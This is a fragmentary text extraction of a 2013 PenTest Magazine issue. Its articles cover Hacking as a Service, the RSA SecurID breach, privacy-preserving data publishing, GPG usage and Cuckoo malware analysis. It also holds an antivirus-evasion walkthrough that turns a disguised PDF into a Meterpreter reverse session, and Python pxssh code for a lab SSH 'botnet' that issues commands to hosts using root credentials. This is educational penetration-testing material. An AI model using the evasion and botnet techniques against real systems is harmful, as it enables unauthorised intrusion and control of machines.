PenTest 2013-5
PenTest 2013-5
PenTest 2013-5
Improve your
Firewall Auditing
As a penetration tester you have to be an expert in multiple
technologies. Typically you are auditing systems installed and
maintained by experienced people, often protective of their own
methods and technologies. On any particular assessment testers may
have to perform an analysis of Windows systems, UNIX systems, web
applications, databases, wireless networking and a variety of network
protocols and firewall devices. Any security issues identified within
those technologies will then have to be explained in a way that both
management and system maintainers can understand.
he network scanning phase of a
penetration assessment will quickly
identify a number of security
weaknesses and services running on the
scanned systems. This enables a tester to
quickly focus on potentially vulnerable
systems and services using a variety of tools
that are designed to probe and examine
them in more detail e.g. web service query
tools. However this is only part of the picture
and a more thorough analysis of most
systems will involve having administrative
access in order to examine in detail how
they have been configured. In the case of
firewalls, switches, routers and other
infrastructure devices this could mean
manually reviewing the configuration files
saved from a wide variety of devices.
Although various tools exist that can
examine some elements of a configuration,
the assessment would typically end up
being a largely manual process. Nipper
Studio is a tool that enables penetration
testers, and non-security professionals, to
quickly perform a detailed analysis of
network infrastructure devices. Nipper
Studio does this by examining the actual
configuration of the device, enabling a much
more comprehensive and precise audit than
a scanner could ever achieve.
www.titania.com
Dear Readers,
e have a pleasure to present you the newest isW
sue of PenTest Regular. The Pentesters Development Kit will allow you to take your penetration
testing skills to the next level. This month, you will encounter ten articles which will give you a wide scope
of techinques and tools and will definitely help you in
your career.
All trade marks presented in the magazine were used only for
informative purposes.
All rights to trade marks presented in the magazine are
reserved by the companies which own them.
DISCLAIMER!
Page
http://pentestmag.com
CONTENTS
06Hacking as a Service
10
TECHNIQUES
16
Privacy-preserving data publishing is an exciting research area. This article presents different technical proposals to the
demand of simultaneous information sharing and privacy protection. However, the problems of data privacy cannot be fully
solved only by technology. We believe that there is an urgent
need to bridge the gap between advanced privacy preservation technology and current policies.
28
Imagine a ghost robot in every computer, working in the shadows; lets call it the Phantom, performing tasks for its master.
The master controls the ghosts through a master brain device; lets call it the cerebrum, much like the device Prof Xavier had in the X-Men. That device could control the minds of
mutants all over the world. In this case, the cerebrum controls
the phantoms in each computer of my home and workplace.
Page
TOOLS
This article will outline implementing an automated virtual environment to aid in the identification and analysis of potentially
malicious software, what can then be extended to proactively
detect and ultimately protect corporate environments from being infected.
Magic Help in
50Unicorn
Reconnaissance
By Aleksandar Bratic
54
60
By Jason Nehrboss
Cisco routers have a number of remote access and management services available. One of the most used and least insecure is SNMP. The article shows some of the common techniques and demonstrates a new tool for taking over routers
that are vulnerable. Virtually all networking devices support
SNMP, and most network monitoring and management software uses it.
By Midnitesnake
The USB Rubber Ducky or Ducky, for short, is a programmable Human Interface Device (HID), that, when inserted into an
Operating System (OS), will interact or assume the identity of
a certain device: keyboard, mass storage, or a given combination, allowing the injection of keystrokes or applications into
the OSs memory. The key focus on the Ducky is that it can be
programmed in a simple high-level language that any user of
any technical skill level can quickly and easily learn to program.
http://pentestmag.com
Hacking as a Service
To gain insight into their security vulnerabilities, companies
perform penetration tests on their websites and infrastructure.
Mostly, the tests are performed ad hoc or maybe on a yearly
basis. This is not sufficient due to the continuous change of the IT
landscape and the new vulnerabilities discoveries. The question
that rises is: How can companies keep their security exposure
visible despite these changes? In this article, we focus on one
possible answer to this: Hacking as a Service.
sure of the organization visible, up-to-date, and compliant with regulations, periodic penetration testing is
needed. Hacking as a Service(HaaS), is a service in
which a third party periodically tests the online environment for security issues, compares the difference
in the results from previous tests and gives the client
an up-to-date insight in its exposure.
In this article we describe some key elements of
Hacking as a Service, how it works and the dynamic way of vulnerability reporting.
Page 6
http://pentestmag.com
Organization that offers the service (service provider) needs a highly secured penetration testing environment which includes the preferred penetration
testing tools, such as Nmap, Dirbuster, Nexpose,
Wireshark and Nessus. The penetration testing
environment should be used to automate as many tasks as possible to consistently use the tools
to detect hosts, perform port scans and vulnerability scanning on infrastructure and application. This
allows comparison of results between the tests and
enables the client to determine the progress made
in remedying the identified risks. The penetration
testing environment may change also because of
the changes of the threat landscape or the release
of new penetration testing tools and methodolo05/2013 (24) August
Low
Medium
High
10
8
6
4
2
0
Security test 1
Security test 2
Security test 3
Security test 4
Open
Closed
1
Page 7
http://pentestmag.com
Aside from vulnerability reporting, it is also important to get vulnerabilities addressed. However, the
remediation should be done by a separate party,
so that independence of the penetration testers
can be maintained. Consider this scenario: The
service provider performed a penetration test and
delivered to the client the report with detailed information about the observations. After a certain time,
the service provider performed the same penetration test with the same scope again and the same
vulnerabilities showed up.
Frequently, client reads the report but no further
actions are taken. The report is then put in an archive, sometimes some of the vulnerabilities are
fixed and the other ones get forgotten over time.
The main reason why vulnerabilities are not addressed properly, is because nobody has taken
the responsibility for fixing them or the follow-up
actions are not tracked. That is the reason why
vulnerability tracking is needed. The vulnerability
tracking module has some critical success factors:
If nobody is responsible, nobody will act. Therefore, all the new vulnerabilities should be assigned
to a specific person responsible for remedying the
vulnerability.
Page 8
http://pentestmag.com
It is important to assign a priority to each of the vulnerabilities. The priority will inform the assignee in
which sequence the vulnerabilities need to be fixed.
Conclusion
Rob Muris
Trajce Dimkov
Page 9
Trajce Dimkov has obtained a PhD in Information Security with focus on physical penetration and social engineering
methodologies. With over 6 years of experience, Trajce is a part of the Security
& Privacy Team of Deloitte Netherlands,
where he is involved in a number of penetration testing assignments.
http://pentestmag.com
Page 10
http://pentestmag.com
In 2011 Lockheed Martin and several other major United States defense contractors reported attempted security breaches identified as part of an
attack relating to the same advanced persistent
threat [14]. The threat agent utilized a zero-day
weakness in the RSA SecurID token to attempt
to infiltrate the networks of the defense contractor
victims [10]. While the attack on the defense contractors was largely unsuccessful in exfiltrating
proprietary and sensitive data, it was later confirmed that the most alarming compromise had already taken place [1]. The zero-day weakness in
RSAs SecurID token was later confirmed by RSA
to have been traceable to a previous attack where
RSA had proprietary seed values for the technology stolen [1].
The breach at RSA was a multiphase compromise that began with careful research by the threat
agent for a sustained period of time [10]. After a
series of vulnerable employees were identified by
the threat agent, a spear phishing e-mail was distributed containing a malicious Excel spreadsheet.
05/2013 (24) August
Page 11
http://pentestmag.com
Page 12
http://pentestmag.com
Conclusions
Page 13
http://pentestmag.com
[1] Coviello, A. W. (2011, June 06). Open Letter to RSA Customers. Retrieved October 22, 2012, from RSA: http://www.
eweek.com/c/a/Security/RSA-Will-Replace-SecurID-Tokens-in-Response-to-Lockheed-Martin-Attack-409915/
[2] FireEye Inc. (2012). Cyber Attacks on Government. Milpitas: FireEye Inc.
[3] Gorman, S., & Tibken, S. (2011, June 07). Security Tokens Take Hit. Retrieved October 20, 2012, from Wall Street
Journal: http://online.wsj.com/article/SB10001424052702304906004576369990616694366.html
[4] Hazlewood, V. (2006). Defense-In-Depth: An Information Assurance Strategy for the Enterprise. La Jolla: San Diego
Supercomputer Center.
[5] Imperva. (2011). Hacker Intelligence Summary Report. Redwood Shores: Imperva.
[6] Kushner, D. (2013). The Real Story of Stuxnet. IEEE Spectrum, 48-53.
[7] Maiffert, M., & Lentz, R. (2011). How Operation Aurora, Trojans, bots, and other targeted attacks are overrunning
todays network defenses. Milpitas: FireEye and Modern Walware Exposed.
[8] Masood, R., Um-e-Ghazia, U., & Anwar, Z. (2011). SWAM: Stuxnet Worm Analysis in Metasploit. Frontiers of Information Technology, 142-147.
[9] Miller, R. (2012, July 1). Advanced Persistent Threats: Defending From The Inside Out. Targeted Attacks, pp. 1-16.
[10] Rashid, F. Y. (2011, June 07). RSA Will Replace SecurID Tokens in Response to Lockheed Martin Attack. Retrieved
October 22, 2012, from eWeek: http://www.eweek.com/c/a/Security/RSA-Will-Replace-SecurID-Tokens-in-Responseto-Lockheed-Martin-Attack-409915/
[11] Sanger, D. E., Barboza, D., & Perlroth, N. (2013, February 19). Chinese Army Unit Is Seen as Tied to Hacking Against
U.S. The New York Times, p. A1. Retrieved from The New York Times.
[12] Schmitt, M. N., et al. (2013). The Tallinn Manual. Cambridge: Cambridge University Press.
[13] Stallings, W., & Brown, L. (2012). Computer Security Principals and Practice. Upper Saddle River: Prentice Hall.
[14] Woodburn, D. (2011, June 13). Lockheed hack scares away RSA partners. Computer Reseller News, p. 1.
Lance Cleghorn
Page 14
http://pentestmag.com
A BZ Media Event
Over 60
San Francisco
October 15-17, 2013
www.BigDataTechCon.com
TECHNIQUES
Privacy-Preserving
Data Publishing
Privacy-Preserving Data Publishing (PPDP) is concerned mainly
with the feasibility of anonymizing and publishing personspecic data for data mining without compromising the privacy of
individuals.
ata collection and publishing are ubiquitous in todays world. Many organizations
such as governmental agencies, hospitals, and nancial companies collect and disseminate various person-specic data for research
and business purposes. Worldwide governments
systematically collect personal information about
their citizens through censuses. These data are
released to public for demographic research. In
the medical domain, gaining access to high-quality healthcare data is a vital requirement to informed decision-making for medical practitioners
and researchers. Grocery stores collect a large
amount of customer purchase data via store courtesy cards. These data are analyzed to model
customer behaviour and are used by advertisement companies. In the online world, web sites
and service providers (Google for example) collect search requests of users for future analysis.
Recent data publishing by AOL is a unique example of this kind [3]. Finally, the emergence of
new technologies such as RFID tags, GPS-based
devices, and smartphones raises new privacy
concerns. These devices are used extensively in
many network systems including mass transportation, car navigation, and healthcare management. The collected trajectory data captures the
detailed movement information of the tagged ob05/2013 (24) August
jects, offering tremendous opportunities for mining useful knowledge. However, this trajectory
data contains peoples visited locations and thus
reveals identiable sensitive information such as
social customs, religious inclination, and sexual
preferences. Thus, data about individuals gets
collected at various places in various ways.
This data offers tremendous opportunities for
mining useful information, but also threatens personal privacy. Data mining is the process of extracting useful, interesting, and previously unknown information from large datasets. Due to
the rapid advance in the storing, processing, and
networking capabilities of the computing devices;
the collected data can now be easily analyzed to
infer valuable information for research and business purposes. Data from different sources can be
integrated and further analyzed to gain better insights. The success of data mining relies on the
availability of high quality data and effective information sharing. Since data mining is often a key
component of many systems of business information, national security, and monitoring and surveillance; the public has acquired a negative impression of data mining as a technique that intrudes on
personal privacy. This lack of trust has become an
obstacle to the sharing of personal information for
the advancement of the technology.
Page 16
http://pentestmag.com
Real-Life Examples
The current practice in data sharing primarily relies on policies and guidelines on the types of data that can be shared and agreements on the use
of shared data. This approach alone may lead to
excessive data distortion or insufcient protection.
For example, the most common practice is to remove the identiable attributes (such as name,
social security number) of individuals before releasing the data. This simple technique though apparently looks innocuous, in reality fails to protect
the privacy of record holders. Also, contracts and
agreements cannot prevent an insider from intentionally performing privacy attacks or even stealing data. In this section, we present a number of
real-world attacks to emphasize the need of privacy-preserving techniques and to illustrate the challenges in developing such tools.
The most illustrious privacy attack was demonstrated by Sweeney [8]. In Massachusetts, Group
Insurance Commission (GIC) collected the medical data of the state employees. The data set had
no identiable attributes such as name, social security number or phone numbers and thus was
believed to be anonymous. GIC gave a copy of
the data to researchers and sold a copy to industry. However, the data set did contain demographic information such as date of birth, gender, and
ZIP code. Sweeney reported that 87% of the U.S.
population can be uniquely identied based on
5-digit zip code, gender and date of birth. It is not
common to nd many people with the same date
of birth, less likely for them to live in the same
place and very less likely having same gender.
She bought a copy of the Massachusetts voter
registration list for $20 and identied the record
of William Weld, governor of the state of Massachusetts, by joining both the tables. This kind of
attack where external data can be used to identify
an anonymous data is called linking attack. The
concern of linking attacks has escalated in recent
years due to the ease of collecting external information over the Internet.
Not all linking attacks require external information. Sometimes the semantic information of the
data itself reveals the identity of a user. The case
of the AOL data release is a notable example. On
August 6, 2006, AOL released a 2GB le containing the search queries of its 650,000 users. There
are approximately 20 million search queries collected over a three month period. As a privacy protection mechanism, AOL removed all user identities except for the search queries and assigned a
random number to each of its users. Three days
later, two New York Times reporters identied and
interviewed the user #4417749 from the release
data [3]. Ms. Thelma Arnold was re-identied from
the semantic information of her search queries.
She said, We all have a right to privacy. Nobody
should have found this all out.
Netix, a movie renting service, announced a
$1,000,000 prize for 10% improvement for their
recommendation system. To assist the competition, they also provided a real data set which contains 100 million ratings for 18,000 movie titles from
480,000 randomly chosen users. According to the
Netix website, To protect customer privacy, all
personal information identifying individual customers has been removed and all customer ids have
been replaced by randomly assigned ids. Narayanan and Shmatikov shortly attacked the Netix
data by linking information from the International
Movie Database (IMDb) site, where users post
their reviews (not anonymous) [7]. They showed
With 8 movie ratings (of which 2 may be completely wrong) and dates that may have a 14-day error,
99% of records can be uniquely identied in the
data set. For 68%, two ratings and dates (with a
3-day error) are sufcient.
It is evident from the above examples that mere
removal of the personal information does not ensure privacy to the users. To overcome this ob-
Page 17
http://pentestmag.com
TECHNIQUES
stacle, the research on Privacy-Preserving Data
Publishing (PPDP) is concerned mainly with the
feasibility of anonymizing and publishing personspecic data for data mining without compromising
the privacy of individuals. The research is also concerned with designing a unied framework of algorithms for anonymizing large data sets in various
real-life data publishing scenarios. In the following
section, we elaborate on the different phases of
privacy-preserving data publishing and discuss different real-life data publishing scenarios.
Page 18
http://pentestmag.com
Privacy Models
Job
Sex
Age
Disease
Engineer
Engineer
Lawyer
Writer
Writer
Dancer
Dancer
Male
Male
Male
Female
Female
Male
Female
35
38
38
30
33
30
30
Hepatitis
Hepatitis
HIV
Flu
HIV
HIV
HIV
Sex
Age
Disease
1
2
3
Professional
Professional
Professional
Male
Male
Male
[35-40)
[35-40)
[35-40)
Hepatitis
Hepatitis
HIV
4
5
Writer
Writer
Female
Female
[30-35)
[30-35)
Flu
HIV
6
7
Dancer
Dancer
*
*
30
30
HIV
HIV
Page 19
http://pentestmag.com
TECHNIQUES
all table. The notion of personalized privacy allows
each record owner to specify her own privacy level. This model assumes that a sensitive attribute has
a taxonomy tree and each record owner species a
guarding node in the taxonomy tree. All of these models, which are known partition-based privacy models,
partition the data table in to groups and provide different guarantees about the anonymized data based
on the assumption of the adversarys background
knowledge. Recent research works show that the algorithms that satisfy partition-based privacy models
are vulnerable to various privacy attacks and do not
provide the claimed privacy guarantee.
Differential privacy has received considerable attention as a substitute for partition-based privacy
modelsin privacy-preserving data publishing. Differential privacy provides strong privacy guarantees
independent of an adversarys background knowledge, computational power or subsequent behavior. Partition-based privacy models ensure privacy
by imposing syntactic constraints on the output.
For example, the output is required to be indistinguishable among k records, or the sensitive value
to be well represented in every equivalence group.
Instead, differential privacy guarantees that an adversary learns nothing more about an individual, regardless of whether her record is present or absent
in the data. Informally, a differentially private output
is insensitive to any particular record. Thus, if a user had opted in the database, there would not be a
signicant change in any computation based on the
database. Therefore, this assures every individual
that any privacy breach will not be a result of participating in a database. Following we present the
formal denition of the differential privacy model. A
general overview of on differential privacy can be
found in the recent survey [5].
Differential Privacy
A randomized algorithm Ag is differentially private if
for all data sets D and D where their symmetric difference contains at most one record (that is, |DD|
1), and for all possible anonymized data sets ,
Anonymization Techniques
Sex
Age
Bucket
Engineer Male 35 1
Engineer Male 38 2
Lawyer Male 38 1
Writer Female 30 3
Writer Female 33 2
Dancer Male 30 3
Dancer Female 30 3
Male
Male
Male
Female
Female
Male
Female
35
38
38
30
33
30
30
1
2
1
3
2
3
3
Page 20
http://pentestmag.com
Disease
1
1
2
2
3
3
3
Hepatitis
HIV
Hepatitis
HIV
Flu
HIV
HIV
Generalization
Generalization provides better data utility compared
to suppression by replacing the specic value with
a more general value. While suppression works in
a binary fashion (keep the original value or suppress), generalization has a number of intermediate states according to a taxonomy tree for each attribute. Figure 2 depicts the taxonomy trees for the
attributes Job, Sex and Age. For example in Table
1(b), the values Engineer and Lawyer are replaced
by a more general value Professional according to
the taxonomy tree. Generalization techniques can
be classied mainly into two categories: global vs.
local. In global generalization, all instances of a value are mapped to the same general value. While in
local generalization, different instances can be generalized to different general values. A range of algorithms have been proposed that use generalization
technique to enforce different privacy models [6].
Bucketization
Unlike generalization and suppression, bucketization does not modify the QID and the sensitive
attribute (SA), but de-associates the relationship
between the two. However, it thus also disguises
the correlation between SA and other attributes;
therefore, hinders data analysis that depends on
such correlation. Bucketization was proposed to
achieve -diversity. It divides all the records into
different buckets in such a way that each bucket
contains distinct values of sensitive attribute. Tables 2(a) and 2(b) are the bucketized data, which
satises 2-diversity for the patient data Table 1(a).
Input Perturbation
This approach modies the underling data randomly by either adding noise to the numerical values or
replacing the categorical values with other values
from the domain [2]. The input-perturbated data
are useful at the aggregated level (such as average or sum), but not at the record level. Data recipients can no longer interpret the semantic of each
individual record. Yet, this is a useful technique
if the applications do not require preserving data
05/2013 (24) August
Output Perturbation
This approach rst computes the correct result and
outputs a perturbed version of the result by adding
noise. This technique is often used to achieve differential privacy. For example, the Laplace mechanism, which is a output perturbation-based approach, takes as inputs a data set D, a function f,
and the privacy parameter . The privacy parameter determines the magnitude of noise added to
the output. The mechanism rst computes the true
output f(D), and then returns the perturbated answer f() = f(D) + Lap(), where Lap() is a random
variable sampled
from a Laplace distribution with
2
variance 2 and mean 0.
Utility Metrics
While protecting privacy is a critical element in data publishing, it is equally important to preserve
the utility of the published data because this is the
primary reason for publication. A number of utility metrics have been proposed to quantify the information that is present in the anonymized data.
Data publishers use these metrics to evaluate and
optimize the data utility of the anonymized data. In
general, utility metrics can be classied into two
categories: general purpose metric and special
purpose metric.
General Purpose Metric
In many cases, the data publisher does not know
how the released data will be used by the data recipient. In such cases, the data publisher uses the
general purpose metric that measures the similarity between the original data and the anonymized
data. The objective is to minimize the distortion in
the anonymized data. The simplest and most intuitive measure is to count the number of anonymization operations performed on the data set.
For example, in the case of suppression, the data
utility is measured by counting the number of suppressed values. Less suppression means more
utility. Similarly, for generalization, the information
loss is measured by the number of generalization
steps performed. Other metrics include Loss Metric (LM), Normalized Certainty Penalty (NCP), Discernibility Metric (DM), etc.
Page 21
http://pentestmag.com
TECHNIQUES
References
[1] N. R. Adam and J. C. Wortman. Security control methods for statistical databases. ACM Computer Surveys,
21(4):515556, 1989.
[2] R. Agrawal and R. Srikant. Privacy preserving data mining. In Proceedings of the ACM SIGMOD International Conference on Management of Data (SIGMOD), pages 439450, 2000.
[3] M. Barbaro and T. Zeller. A face is exposed for AOL searcher no. 4417749. New York Times, August 9, 2006.
[4] D. M. Carlisle, M. L. Rodrian, and C. L. Diamond. California inpatient data reporting manual, medical information
reporting for california, 5th edition. Technical report, Ofce of Statewide Health Planning and Development, July 2007.
[5] C. Dwork. A rm foundation for private data analysis. Commun. ACM, 54(1):8695, 2011.
[6] B. C. M. Fung, K. Wang, R. Chen, and P. S. Yu. Privacy-preserving data publishing: A survey of recent developments.
ACMComputing Surveys, 42(4):153, June 2010.
[7] A. Narayanan and V. Shmatikov. Robust de-anonymization of large sparse datasets. In Proceedings of the IEEE
Symposium on Security and Privacy (S&P), pages 111125, 2008.
[8] L. Sweeney. k-anonymity: A model for protecting privacy. In International Journal on Uncertainty, Fuzziness and
Knowledge-based Systems, volume 10, pages 557570, 2002.
Conclusion
Privacy-preserving data publishing is an exciting research area. This article presents different technical
proposals to the demand of simultaneous information sharing and privacy protection. However, the
problems of6 data privacy can not be fully solved only by technology. We believe that there is an urgent
need to bridge the gap between advanced privacy
preservation technology and current policies. In the
future, we expect that social and legal regulations
will complement the best practices of privacy-preserving technology. To this end, it is also important
to standardize some privacy models and algorithms
for different applications as it is unlikely that there exists a one-size-t solution for all application scenarios. Thus, the future research direction appears to lie
in dening suitable privacy models, and in developing trustworthy algorithms and systems that provide
performance guarantees ensuring the security and
privacy of data for specic applications.
05/2013 (24) August
Noman Mohammed
BENJAMIN C. M. FUNG
Page 22
http://pentestmag.com
TECHNIQUES
AV Evasion:
Bypassing AV Products and Protection Against It
AV evading techniques are getting better and smarter by the
day, and having just an Anti-Virus and Anti-Spyware application
is insufficient to protect our machines from additional angles of
threats.
Objective
Before We Begin
Page 24
http://pentestmag.com
Figure 5. The more stealth you want, the bigger the size of
the file
05/2013 (24) August
http://pentestmag.com
TECHNIQUES
In this scenario, we are using the following specifications for the victims machine:
Windows Server 2008 SP2 (64bit) and Windows 7 Enterprise SP1 (64bit),
Data Execution Prevention settings is set to
Turn on DEP for essential Windows Programs
and Services only,
Symantec Endpoint Protection v11.x Antivirus
and Anti Spyware Protection only.
Execution of Employees
Salaries-Confidential.pdf
Both machines, when the Employees Salaries-Confidential.pdf was executed, allowed us to get a meterpreter session (see Figure 12) despite having an
updated definition of Symantec Endpoint Protection.
Prevention (I)
http://pentestmag.com
attack and classify the attack as a Meterpreter Reverse TCP attack (see Figure 14).
In the Security Log (see Figure 15), it is able to
log the event, the type of attack, where the attack
originated from, and the full path of the executable.
References
Prevention (II)
What is DEP?
Data Execution Prevention (DEP) is a security feature that can help prevent damage to your computer from viruses and other security threats. Harmful
programs can try to attack Windows by attempting to run (also known as execute) code from system memory locations reserved for Windows and
other authorized programs. These types of attacks
can harm your programs and files.
DEP can help protect your computer
by monitoring your
programs to make
sure that they use
system
memory
safely. If DEP notices a program on
your computer using memory incorrectly, it closes the
program and notifies you.
Figure 16. Data Execution
Prevention Option
Conclusion
FADLI B. SIDEK
Page 27
http://pentestmag.com
TECHNIQUES
Phantoms Cerebrum
Using Python to Work a Botnet
Imagine a ghost robot in every computer, working in the shadows,
lets call it the Phantom, performing tasks for its master. The master
controls the ghosts through a master brain device, lets call it the
cerebrum, much like the device Prof Xavier had in the X-Men. That
device could control the minds of mutants all over the world. In
my case, the cerebrum controls the phantoms in each computer of
my home and workplace.
Introduction
Page 28
http://pentestmag.com
a programmer with the Python interpreter, the standard library, and several builtin modules. The Python standard library and builtin modules provide
an extensive range of capabilities, including built
in data types, exception handling, numeric and
math modules, file handling capabilities, cryptographic services, interoperability with the operating system, Internet data handling, and interaction
with IP protocols, among many other useful modules. However, a programmer can easily install
any third party packages. A comprehensive list
of third party packages is available at http://pypi.
python.org/pypi/.
If you are not comfortable with Python or havent
used it before, I highly recommend this http://
www.pythonforbeginners.com/systems-programming/how-to-use-fabric-in-python/.
Fabric Basics
Create a fabfile
Fabfiles
Installation
Advanced users wanting to install a development version may use pip to grab the latest master branch (as well as the dev version of the
Paramiko dependency):
Figure 1. Phantoms and its Cerebrum
05/2013 (24) August
http://pentestmag.com
TECHNIQUES
Or, to install an editable version for debugging/
hacking, execute pip install e. (or python setup.
py install) inside a downloaded or cloned copy of
the source code.
It is important to note that Fabric tries to automatically detect the type of authentication needed
(password or passphrase for private key). Therefore, if the passwords stored in the credentials file
are for private keys, they should work seamlessly.
Now that we have our credentials, lets consider
what functions will we create. For the sake of this
post, lets implement the following:
Status check to see which hosts are running,
Run a supplied command on multiple selected
hosts,
Create an interactive shell session with a host.
To start, we will import all members of the fabric.
api namespace: (import fabric.py)
from fabric.api import *
Next, we will use two of Fabrics environment variables, env.hosts and env.passwords, to manage our
host connections. Env.hosts is a list we can use to
manage our master host list, and env.passwords is
05/2013 (24) August
Page 30
http://pentestmag.com
uptime, hosts=env.hosts).iteritems():
running_hosts[host] = result if result.
succeeded else "Host Down"
Page 31
http://pentestmag.com
TECHNIQUES
Listing 4. Menu function in action
C:\>python fabfile.py
[[email protected]:22] Executing task run_command
[[email protected]:22] Executing task run_command
[0] List Hosts
[1] Run Command
[2] Open Shell
[3] Exit
fabric $ 1
ID
| Host
| Status
---------------------------------------0 | [email protected]:22
| 07:27:14 up 10:40,
1 | [email protected]:22
| 07:27:12 up 10:39,
2 users,
3 users,
List Hosts
Run Command
Open Shell
Exit
Page 32
http://pentestmag.com
We call this a botnet because the compromised computers act like bots to carry out instructions.
In order to construct our botnet, we will have to
introduce a new concept a class. The concept
of a class serves as the basis for a programming
model named object oriented programming. In this
system, we instantiate individual objects with associated methods. For our botnet, each individual
bot or client will require the ability to connect and
issue a command (Listing 5).
Examine the code to produce the class object
Client(). Building the client requires a hostname,
username, and a password or a key. Furthermore,
the a class contains the methods required to sustain a client connect(), send_command(), alive().
Notice that when we reference a variable belonging
to a class, we call it self followed by the variable
name. To construct the botnet, we build a global array
named botnet and this array contains individual client
objects. Next, we build a function named addClient()
that takes a host, user, and password as input to instantiate a client object and add it to the botnet ar-
Host: 1
[[email protected]:22] Executing task open_
shell
Last login: Wed Jul 24 07:27:44 2013 from
192.168.56.1
root@milindlab:~# whoami
root
root@milindlab:~# exit
logout
[0] List Hosts
[1] Run Command
[2] Open Shell
[3] Exit
fabric $ 3
2 users,
3 users,
import pxssh
class Client:
def __init__(self, host, user, password):
self.host = host
self.user = user
self.password = password
self.session = self.connect()
def connect(self):
try:
s = pxssh.pxssh()
s.login(self.host, self.user, self.password)
return s
except Exception, e:
print e
print [-] Error Connecting
def send_command(self, cmd):
self.session.sendline(cmd)
self.session.prompt()
return self.session.before
Page 33
http://pentestmag.com
TECHNIQUES
ray. Next, the botnetCommand() function takes an argument of a command. This function iterates through
the entire array and sends the command to each client in the botnet array (see Listing 6).
By wrapping everything up, we have our final SSH
botnet script. This proves an excellent method for
mass controlling targets. To test, we make three
copies of our current BacktTack 5 virtual machine
and assign. We see that we can the script iterate
through these three hosts and issue simultaneous
commands to each of the victims. While the SSH
Botnet creation script attacked servers directly, the
next section will focus on an indirect attack vector to
target clients through vulnerable servers, and an alternate approach to building a mass infection.
Conclusion
same functionality could extend to any other IT automation solution such as Chef, Puppet, or Ansible.
Milind Bhargava
botNet = []
addClient(192.168.56.110, root, toor)
addClient(192.168.56.120, root, toor)
addClient(192.168.56.130, root, toor)
botnetCommand(uname -v)
botnetCommand(cat /etc/issue)
Page 34
http://pentestmag.com
TECHNIQUES
Cryptography
with GPG
We are familiar with cryptography and know something about it
but lets review its history. Cryptography is a technique for secure
communication. In a community, it may mean relationships
between individuals in a society or relationships on the Internet.
The Cryptography from the present world is pulled into the
world of the Internet. The present, or modern, cryptography
engages topics like mathematics, computer science, and electrical
engineering.
Page 36
http://pentestmag.com
Plain: A B C D E F G H I J K L M N O P Q R S T U V
W X Y Z
Cipher: D E F G H I J K L M N O P Q R S T U V W X
Y Z A B C
Asymmetric key algorithms refer to a cryptographic system with two separate keys, one of
which is secret and one of which is public. Although the two keys are different, both parts of
the key pair are mathematically linked. The first
key task is locked or encrypts the plaintext, and
the other one unlocks or decrypts the ciphertext.
The keys are correlative and neither key can perform both functions by itself. The public key can
be published without worries, but the private key
must not be shown to anyone not authorized to
read the messages. Unlike symmetric key algorithms, a public key algorithm does not require a
secure channel to exchange secret keys between
the sender and the receiver. It is the infrastructure
of several Internet standards like Transport Layer
Modern Cryptography
Page 37
http://pentestmag.com
TECHNIQUES
Security (TLS), PGP, and GPG. Each user has
two keys (a public encryption key and a private
decryption key). The public key is available to the
public, but the private key is known only to the recipient. Messages are encrypted with the recipients public key, and can be decrypted only with
the corresponding private key.
We want to describe GnuPG that is used widely
on the Internet.
PGP is used for signing, encrypting, and decrypting texts, emails, files, directories, and partitions.
Each public key is added to a username and/or an
email address. For privacy, PGP combines symmetrickey encryption and publickey encryption.
GnuPG, or GPG, is suite of cryptographic software; it is an OpenPGP standard compliant system. GPG program by default is a command line
program but some graphical user interface is provided for it. For example, GnuPG encryption support has been integrated into Kmail, Evolution and
Thunderbird. These are other GUI tools for GPG,
Seahorse for GNOME, KGPG for KDE. GPG is
used in some messengers too, for example psi
and fire. These messengers can automatically
secure messages when GnuPG is installed and
configured. GPG is also embedded in web applications; webbased software such as Horde also
makes use of it. FireGPG is a good example for
Mozilla Firefox. GnuPG also supports symmetric
encryption algorithms but by default, GnuPG uses
the CAST5 symmetrical algorithm.
You can install GPG very easy. It is installed by
default on many Linux distros. For more information about it visit http://www.gnupg.org/.
Page 38
http://pentestmag.com
Enter y to finish the process. Next, you must enter your name and email address (see Listing 3),
but remember that this information is for authenticating you as a real individual. You can use the
comment field to include aliases or other information. Then, below message appears:
Change (N)ame, (C)omment, (E)mail or (O)kay/(Q)uit?
You can edit your previous information; for example, enter N to change your name. If the data is
correct, enter O for confirmation.
Make a Backup
To list the keys on your public keyring use the following command:
Page 39
http://pentestmag.com
TECHNIQUES
mohsen@crunchbang-jokar:~$ gpg --list-keys
/home/mohsen/.gnupg/pubring.gpg
------------------------------pub 2048R/08E3A968 2013-01-08 [expires: 2014-01-08]
uid
mohsen <XXXXXXXXX>
sub 2048R/12D6F55B 2013-01-08 [expires: 2014-01-08]
The key that has been generated by this command is in binary format, but gpg has a command --armor that will generate your key in the
ASCII format.
mohsen@crunchbang-jokar:~$ gpg --output <a name>.
gpg --armor --export <your email>
he encrypts it using your public key, and you decrypt it with your private key.
To encrypt a document we use the encrypt option. You must have the public keys of the user so
this message can be encrypted and sent. GPG uses
the --output option to output the result. For example:
mohsen@crunchbang-jokar:~$ gpg --output <output
file> --encrypt --recipient <Recipients email>
<input file>
Page 40
http://pentestmag.com
quently modified in any way, verification of the signature will fail. It is like a handwritten signature
with the additional benefit. The user can be sure
a file has not been modified since it was created.
Creating and verifying signatures use the public/
private keypair but not like encryption and decryption, it is a different operation. For example, you
want to use your own private key to digitally sign
a letter and send it to the PenTest Magazine. The
editor uses your public key to check the signature
and verify that the submission indeed came from
you and that it had not been modified since you
sent it. The commandline option --sign is used
to make a digital signature:
You can check the signature or check the signature and recover the original document. For this
purpose --verify option is used.
Page 41
http://pentestmag.com
TECHNIQUES
mohsen@crunchbang-jokar:~$ gpg --verify <input file>
gpg: Signature made Wed 09 Jan 2013 03:31:42 AM
EST using RSA key ID 08E3A968
gpg: Good signature from mohsen <XXXXXXXXXX>
Reference
An Introduction To Cryptography
Codes and Ciphers Julius Caesar the Enigma and
the Internet
Codes, Ciphers And Secret Writing
Cryptography and Public Key Infrastructure on the
Internet
http://www.wikipedia.org/
http://www.gnupg.org/
http://fedoraproject.org/
Conclusion
Page 42
http://pentestmag.com
TOOLS
Automating Malware
Analysis with Cuckoo
Malicious software has always been problem in the computer industry.
Understanding the way this type of software is written, the impact
it presents to the infected, and removal methodologies is a time
consuming process, especially in corporate environments where you
have thousands of connected devices. A recent study on published by
Panda Labs in 2012 indicated that over 27 million innovative strands of
malware were discovered in the wild [1]. The need for quick, accurate,
and highly automated analysis of malware is warranted.
his article will outline implementing an automated virtual environment to aid in the
identification and analysis of potentially malicious software, what can then be extended to proactively detect and ultimately protect corporate environments from being infected.
Introduction
